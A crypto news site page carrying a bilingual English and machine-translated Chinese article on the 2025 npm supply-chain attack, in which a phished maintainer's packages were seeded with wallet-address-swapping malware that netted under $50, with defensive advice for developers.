市值: $2.1255T 4.27%
體積(24小時): $93.4122B 20.04%
  • 市值: $2.1255T 4.27%
  • 體積(24小時): $93.4122B 20.04%
  • 恐懼與貪婪指數:
  • 市值: $2.1255T 4.27%
加密
主題
加密植物
資訊
加密術
影片
頭號新聞
加密
主題
加密植物
資訊
加密術
影片
bitcoin
bitcoin

$87959.907984 USD

1.34%

ethereum
ethereum

$2920.497338 USD

3.04%

tether
tether

$0.999775 USD

0.00%

xrp
xrp

$2.237324 USD

8.12%

bnb
bnb

$860.243768 USD

0.90%

solana
solana

$138.089498 USD

5.43%

usd-coin
usd-coin

$0.999807 USD

0.01%

tron
tron

$0.272801 USD

-1.53%

dogecoin
dogecoin

$0.150904 USD

2.96%

cardano
cardano

$0.421635 USD

1.97%

hyperliquid
hyperliquid

$32.152445 USD

2.23%

bitcoin-cash
bitcoin-cash

$533.301069 USD

-1.94%

chainlink
chainlink

$12.953417 USD

2.68%

unus-sed-leo
unus-sed-leo

$9.535951 USD

0.73%

zcash
zcash

$521.483386 USD

-2.87%

加密貨幣新聞文章

NPM攻擊,黑客和數據洩露:一個加密搶劫案出錯了嗎?

2025/09/10 06:43

潛入最近的NPM加密攻擊:黑客如何折衷數十億美元的下載量,但以不到50美元的價格走開了。供應鏈安全的喚醒呼籲。

NPM攻擊,黑客和數據洩露:一個加密搶劫案出錯了嗎?

Yo, what's the deal with NPM attacks, hackers, and data breaches? It's like the Wild West out here in the JavaScript ecosystem. The latest buzz? A massive NPM crypto attack. Let's break it down, New York style.

喲,NPM攻擊,黑客和數據洩露有什麼關係?就像JavaScript生態系統中的野外西部一樣。最新的嗡嗡聲?大規模的NPM加密攻擊。讓我們分解,紐約風格。

The Great NPM Crypto Caper: A Heist That Fizzled

偉大的NPM加密雀躍:搶劫

So, picture this: Hackers pull off what's being called the largest NPM crypto attack in history. They infiltrated 18 JavaScript packages, impacting billions of downloads. Sounds like a scene from "Mr. Robot," right? But here's the kicker: they stole less than $50. Seriously?

因此,想像一下:黑客刪除了所謂的歷史上最大的NPM加密攻擊。他們滲透了18個JavaScript軟件包,影響了數十億個下載。聽起來像是“機器人先生”的場景,對嗎?但這是踢球者:他們偷走了不到50美元。嚴重地?

It all went down when a well-known developer, “qix” (aka Josh Junon), got hit with a phishing email disguised as an official npmjs.com support message. This email tricked him into updating his two-factor authentication, handing the keys to the kingdom (or, in this case, the NPM account) to the bad guys.

當一個知名的開發人員“ QIX”(又名Josh Junon)被偽裝成NPMJS.Com官方支持消息的網絡釣魚電子郵件擊中時,一切都倒閉了。這封電子郵件欺騙了他更新他的兩因素身份驗證,將鑰匙交給了王國(或在這種情況下為NPM帳戶)。

How They Did It (and Why It Didn't Pay Off)

他們是如何做到的(為什麼它沒有回報)

Once inside, the attackers injected malware into popular libraries like chalk, strip-ansi, and debug. These packages are downloaded billions of times a week. The malware acted as a crypto-clipper, monitoring Ethereum, Bitcoin, Solana, Tron, Litecoin, and Bitcoin Cash wallet addresses. When a transaction started, it swapped the destination address with one controlled by the attacker.

進入室內後,攻擊者將惡意軟件注入了流行的庫,例如粉筆,脫衣舞和調試。這些軟件包每週下載數十億次。該惡意軟件充當加密脫衣者,監視以太坊,比特幣,索拉納,Tron,Litecoin和比特幣現金錢包地址。當交易開始時,它將目標地址交換了攻擊者控制的目標地址。

But here's where the story takes a turn. According to Security Alliance, the hacker's Ethereum address (0xFc4a48) received less than $50 in assets. Initial reports showed a measly five cents in Ether, later joined by about $20 of some random memecoin. Either the malware didn't spread far enough, or users caught on quick and shut it down.

但這是故事轉彎的地方。根據安全聯盟,黑客的以太坊地址(0xFC4A48)的資產少於50美元。最初的報告顯示,以太幣的五美分,後來加入了大約20美元的一些隨機模因。惡意軟件的擴散遠遠不夠遠,或者用戶快速捕獲並將其關閉。

Why This Matters (Even Though They Stole Pennies)

為什麼這很重要(即使他們偷了便士)

Even though the financial impact was minimal, this incident shines a spotlight on the ever-present risks of supply chain attacks. Developers who never directly installed the compromised packages could still be exposed because these libraries sit deep in dependency trees.

儘管財務影響很小,但該事件還是關注供應鏈攻擊的普遍風險。從未直接安裝折衷包的開發人員仍然可以暴露出來,因為這些庫坐在依賴樹中。

Charles Guillemet, CTO of Ledger, is urging developers to be cautious and double-check wallet addresses. Crypto apps like Phantom Wallet and Uniswap dodged the bullet, and MetaMask reassured users about their defenses. MetaMask uses multiple layers of defense, including locking code versions and automated checks, to block malicious code.

Ledger的首席技術官Charles Guillemet敦促開發人員保持謹慎和雙重檢查的錢包地址。 Phantom Wallet和Uniswap之類的加密應用程序躲過了子彈,MetAmask向用戶保證了他們的防禦能力。 MetAmask使用多層防禦,包括鎖定代碼版本和自動檢查,以阻止惡意代碼。

The Technical Nitty-Gritty

技術挑剔

The injected code hooked into JavaScript functions like fetch, XMLHttpRequest, and wallet APIs. It intercepted crypto activity in the browser, manipulated wallet interactions, and rewrote payment destinations. This made it dangerous because it tampered with both the content users saw and the API calls being made.

注入的代碼掛在JavaScript函數中,例如Fetch,XMLHTTPRequest和Wallet API。它攔截了瀏覽器中的加密活動,操縱錢包的交互和重寫付款目的地。這使它變得危險,因為它都介紹了用戶所看到的內容和API調用。

Aikido Security noted that the malware only affected users who updated the packages during the brief compromise window. This limited the reach, but it's still a wake-up call.

Aikido Security指出,惡意軟件僅影響在簡短折衷窗口中更新軟件包的用戶。這限制了覆蓋範圍,但這仍然是一個警鐘。

Lessons Learned: Keep Your Guard Up

經驗教訓:保持警惕

This whole mess underscores the need for stronger security practices. Two-factor authentication is a must, but phishing emails are getting sophisticated. Always verify wallet addresses before sending funds and use wallets with built-in security layers like MetaMask and Ledger.

整個混亂強調了對更強大的安全實踐的需求。兩因素身份驗證是必須的,但是網絡釣魚電子郵件越來越複雜。在發送資金之前,請始終驗證錢包地址,並使用帶有內置安全層(例如MetAmask和Ledger)的錢包。

Security firms recommend developers pin dependency versions in their projects and use automated scanning tools to catch unexpected library changes. Staying vigilant is key.

安全公司建議開發人員在其項目中使用PIN依賴性版本,並使用自動掃描工具來捕獲意外的庫更改。保持警惕是關鍵。

Final Thoughts: A Crypto Comedy of Errors

最終想法:錯誤的錯誤喜劇

So, yeah, hackers tried to pull off a massive crypto heist and ended up with pocket change. It's almost comical. But let's not get complacent. This NPM attack is a reminder that even the most secure systems can be vulnerable. Stay sharp, double-check those addresses, and maybe invest in a good spam filter. And remember, in the world of crypto and coding, a little paranoia goes a long way. Stay safe out there!

因此,是的,黑客試圖拔出大量的加密搶劫,最終變化了。這幾乎是可笑的。但是,讓我們不要自滿。這種NPM攻擊提醒您,即使是最安全的系統也可能是脆弱的。保持敏銳,雙重檢查這些地址,也許可以投資一個良好的垃圾郵件過濾器。請記住,在加密和編碼的世界中,一點偏執狂走了很長一段路。在那里安全!

原始來源:livebitcoinnews

免責聲明:info@kdj.com

所提供的資訊並非交易建議。 kDJ.com對任何基於本文提供的資訊進行的投資不承擔任何責任。加密貨幣波動性較大,建議您充分研究後謹慎投資!

如果您認為本網站使用的內容侵犯了您的版權,請立即聯絡我們(info@kdj.com),我們將及時刪除。

2026年07月03日 其他文章發表於